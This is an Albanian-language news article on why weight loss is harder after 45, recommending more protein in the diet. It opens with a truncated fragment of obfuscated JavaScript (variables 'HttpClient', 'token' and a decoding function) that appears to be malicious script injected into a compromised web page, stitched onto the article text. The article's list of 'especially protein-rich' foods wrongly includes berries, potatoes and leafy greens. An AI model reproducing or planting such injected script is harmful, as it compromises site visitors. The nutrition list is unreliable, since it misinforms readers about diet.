;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Si të humbni peshë pas moshës 45 vjeçare

By

Shumë faktorë kontribuojnë në humbjen më të vështirë të peshës pas moshës 45 vjeçare. Siç shpjegojnë ekspertët, këta faktorë variojnë nga gjendjet mjekësore që kanë më shumë gjasa të ndodhin me kalimin e moshës deri tek efektet e disa ilaçeve.

Për më tepër, një nga pasojat kryesore të plakjes mund të jetë një metabolizëm më i ngadaltë, i cili gjithashtu mund të kontribuojë në shtimin e peshës dhe vështirësinë për të humbur peshë. Megjithatë, një zakon i përditshëm mund t’i ndihmojë njerëzit mbi 50 vjeç të humbin peshë më lehtë, raporton Medical News Today.

Bëhet fjalë për konsumimin e rregullt të ushqimeve të pasura me proteina. Domethënë, disa studime të kryera pikërisht në këtë temë tregojnë se konsumimi i më shumë proteinave mund t’i ndihmojë të moshuarit të humbin peshë, domethënë të humbin më shumë yndyrë dhe të mbajnë më shumë masë muskulore sesa nëse hanë ushqim me më pak proteina, transmeton Klankosova.tv.

Ushqimet që janë veçanërisht të pasura me proteina janë mishi i pulës, qumështi dhe produktet e qumështit, perimet me gjethe jeshile, manaferrat, vezët, arrat, soja, farat e kungullit, farat e lulediellit, patatet, brokoli dhe quinoa.

Artikuj të ngjashëm